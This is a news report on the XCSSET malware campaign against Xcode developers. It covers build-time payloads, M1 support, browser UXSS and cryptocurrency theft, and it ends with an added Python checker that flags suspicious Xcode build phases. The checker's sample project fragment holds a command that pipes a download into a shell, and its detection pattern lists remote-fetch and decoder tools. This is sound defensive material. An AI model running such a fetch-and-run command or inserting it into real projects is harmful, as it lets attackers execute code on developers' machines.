A Mac malware campaign targeting Xcode developers has been retooled to add support for Apple’s new M1 chips and to expand its capabilities to steal confidential information from cryptocurrency apps.
XCSSET came into the spotlight in August 2020 after it was observed spreading through modified Xcode IDE projects that were configured to execute the payload upon building. The malware repackages payload modules to imitate legitimate Mac apps, which are ultimately responsible for infecting local Xcode projects and injecting the main payload so that it executes when the compromised project builds.
Then in March 2021, Kaspersky researchers uncovered XCSSET samples compiled for the new Apple M1 chips, suggesting not only that the malware campaign was ongoing but also that the adversaries were actively adapting their executables and porting them to run natively on new Apple Silicon Macs.
“It hosts Safari update packages in the [command-and-control] server, then downloads and installs packages for the user’s OS version,” Trend Micro researchers said in an analysis published on Friday. “To adapt to the newly-released Big Sur, new packages for ‘Safari 14’ were added.”
In addition to trojanizing Safari to exfiltrate data, the malware is also known for exploiting the remote debugging mode in other browsers such as Google Chrome, Brave, Microsoft Edge, Mozilla Firefox, Opera, Qihoo 360 Browser, and Yandex Browser to carry out UXSS attacks.
What’s more, the malware now also attempts to steal account information from multiple websites, including the cryptocurrency trading platforms Huobi, Binance, NNCall.net, Envato, and 163.com, with the ability to replace the address in a user’s cryptocurrency wallet with one under the attacker’s control.
XCSSET’s mode of distribution through doctored Xcode projects poses a serious threat, as affected developers who unwittingly share their work on GitHub could pass the malware on to their users in the form of the compromised Xcode projects, leading to “a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects.”
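Because the payload described above runs when a tampered project is built, one practical defender check before building a cloned or dependency Xcode project is to list its run-script build phases and flag any that fetch or execute remote content. The following is an added example, not code from the article or from the researchers it cites; the project.pbxproj fragment is constructed, and the keyword list is an assumption about what merits manual review, not a signature for XCSSET.

```python
import re

# Constructed project.pbxproj fragment with two run-script build phases:
# one that pipes a download into a shell, one that only runs a linter.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
        AB12 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            name = "Run Script";
            shellPath = /bin/sh;
            shellScript = "curl -s https://example.invalid/x | sh\n";
        };
        CD34 /* Lint */ = {
            isa = PBXShellScriptBuildPhase;
            name = "Lint";
            shellPath = /bin/sh;
            shellScript = "swiftlint lint\n";
        };
/* End PBXShellScriptBuildPhase section */
'''

# Assumed review heuristics: remote fetches, script interpreters, decoders,
# and reaching into an .app bundle from a build step.
SUSPICIOUS = re.compile(
    r"\b(curl|wget|osascript|base64|eval|python|nohup|xattr)\b"
    r"|\|\s*sh\b|\.app/Contents", re.I)

def shell_build_phases(pbxproj: str):
    """Line-based parse of PBXShellScriptBuildPhase entries -> [{name, script}]."""
    phases, current = [], None
    for line in pbxproj.splitlines():
        s = line.strip()
        if s == "isa = PBXShellScriptBuildPhase;":
            current = {"name": "", "script": ""}
        elif current is not None:
            if s == "};":                      # end of this phase's dictionary
                phases.append(current)
                current = None
            elif s.startswith("name = "):
                current["name"] = s[len("name = "):].rstrip(";").strip('"')
            elif s.startswith("shellScript = "):
                raw = s[len("shellScript = "):].rstrip(";").strip('"')
                # pbxproj stores the script as one escaped string
                current["script"] = raw.replace("\\n", "\n").replace('\\"', '"')
    return phases

def flag_suspicious(pbxproj: str):
    """Return (phase name, script) for phases whose script matches SUSPICIOUS."""
    return [(p["name"], p["script"]) for p in shell_build_phases(pbxproj)
            if SUSPICIOUS.search(p["script"])]

if __name__ == "__main__":
    for name, script in flag_suspicious(SAMPLE_PBXPROJ):
        print(f"REVIEW build phase {name!r}:\n{script}")
```

Run it against `MyApp.xcodeproj/project.pbxproj` of any project you did not author before the first build; a flagged phase is a prompt for manual review, not a verdict.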